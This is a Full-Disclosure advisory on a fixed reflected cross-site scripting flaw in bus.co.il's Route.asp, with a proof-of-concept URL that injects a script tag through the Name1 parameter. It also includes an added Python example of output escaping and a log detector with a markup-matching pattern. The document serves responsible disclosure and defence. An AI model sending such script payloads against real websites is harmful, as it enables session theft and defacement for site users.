[Full-disclosure] Bus.co.il - Route.asp Cross-site Scripting vulnerability
- To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Bus.co.il - Route.asp Cross-site Scripting vulnerability
- From: LIAD Mizrachi <liadmz@xxxxxxxxx>
- Date: Mon, 8 Jul 2013 16:29:15 +0300
Advisory: www.bus.co.il - Route.asp Cross-site Scripting vulnerability
Author: Liad Mizrachi
Vendor URL: http://www.bus.co.il
Vulnerability Status: Fixed
==========================
Vulnerability Description
==========================
The 'Name1' and 'Name2' parameters in "Route.asp" are prone to reflected XSS.
==========================
PoC
==========================
// IE 9 & FF 21.0
http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007
==========================
Solution
==========================
Fixed by vendor (verified).
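The following is an added example, not the vendor's code or anything from the advisory: it shows the two defender-side pieces this class of issue calls for. render_name() is the server-side fix, HTML-escaping a reflected parameter before it is placed in page text; find_markup_in_query() is a triage check that percent-decodes the Name1/Name2 values from web-server access logs and flags values that contain markup. The request path is built from the advisory's PoC URL (shortened), and the log lines are constructed in Apache combined format; the real bus.co.il server's log format and page code are not known from the advisory.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as reflected into the Route.asp page.
REFLECTED_PARAMS = ("Name1", "Name2")

# Request path constructed from the advisory's PoC URL (shortened; the
# script payload is percent-encoded exactly as the PoC sends it).
POC_PATH = ("/otobusim/Front2007/Route.asp?RouteID=1"
            "&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e"
            "&Name2=%D7%91%D7%AA+%D7%99%D7%9D&Design=2007")

# Constructed access-log lines in Apache combined format (not real bus.co.il
# logs). Line 1 is a benign lookup, line 2 carries the PoC payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jul/2013:16:29:15 +0300] "GET /otobusim/Front2007/Route.asp'
    '?RouteID=1&Name1=Central+Station&Name2=%D7%91%D7%AA+%D7%99%D7%9D HTTP/1.1" 200 5120',
    '203.0.113.5 - - [08/Jul/2013:16:30:02 +0300] "GET ' + POC_PATH + ' HTTP/1.1" 200 5213',
]

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')

# Heuristic for HTML/script syntax in a decoded parameter value: an opening
# or closing tag, a javascript: URL, or an inline event-handler attribute.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon\w+\s*=", re.IGNORECASE)


def render_name(value: str) -> str:
    """Server-side fix: escape a parameter for an HTML body context before
    reflecting it, so '<script>' is displayed as text rather than executed."""
    return html.escape(value, quote=True)


def reflected_values(path: str) -> dict:
    """Percent-decode the query string and return only the reflected parameters."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {name: params.get(name, []) for name in REFLECTED_PARAMS}


def find_markup_in_query(log_lines):
    """Detection: return (line_no, param, decoded_value) for every reflected
    parameter whose decoded value contains markup."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, values in reflected_values(m.group(1)).items():
            for value in values:
                if MARKUP_RE.search(value):
                    hits.append((line_no, name, value))
    return hits


if __name__ == "__main__":
    payload = reflected_values(POC_PATH)["Name1"][0]
    print("decoded Name1:", payload)
    print("escaped Name1:", render_name(payload))
    for hit in find_markup_in_query(SAMPLE_LOG):
        print("suspicious:", hit)
```

The escaping is specific to the HTML body context; a value placed inside an attribute, a URL or a script block needs the encoding for that context instead. The log check decodes before matching, because the payload only appears as %3cscript%3e on the wire.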
==========================
Disclosure Timeline
==========================
24-June-2013 - vendor informed by mail
27-June-2013 - fixed by the vendor
==========================
References
==========================
http://www.bus.co.il/
http://picturepush.com/public/13422462
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/